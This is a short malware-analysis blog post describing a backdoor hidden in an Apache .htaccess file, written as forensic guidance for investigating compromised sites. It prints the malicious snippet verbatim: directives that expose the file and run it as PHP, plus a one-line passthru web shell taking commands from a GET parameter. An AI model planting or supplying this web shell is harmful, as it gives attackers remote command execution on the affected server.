Republished Malware Analysis Blog Posts From March 2018

A PHP Shell? In MY .htaccess? It’s More Likely Than You think!

On servers running Apache, .htaccess files can be an extremely useful tool, allowing clients to modify the behavior of of their web environment from a file on their site, rather than requiring modifications to the server’s underlying configurations.

Because .htaccess is so powerful in this way, it is often abused by malicious parties. While I’ll save most of those methods for other posts, I found this particular incident and methodology to be noteworthy.

During an investigation, I located an .htaccess file which contained the following code:

<Files ~ "^\.ht"> 
Order allow, deny 
Allow from all 
AddType application/x-httpd-php .htaccess 
<?php passthru($_GET['cmd']); ?>

This uses the functionality inherent in the .htaccess file itself to:

  1. Allow the .htaccess file itself to be accessed remotely by the attacker
  2. Allow code contained within the file to execute as PHP
  3. Contains a PHP backdoor which executes system commands passed to it in the GET parameter “cmd”

Final Thoughts:

It is always wise to investigate .htaccess files on known-compromised sites for evidence of malicious additions of all types. I will discuss additional .htaccess attack types in later posts.

Malware Research

Original Research and Blog Posts by Sky Larsen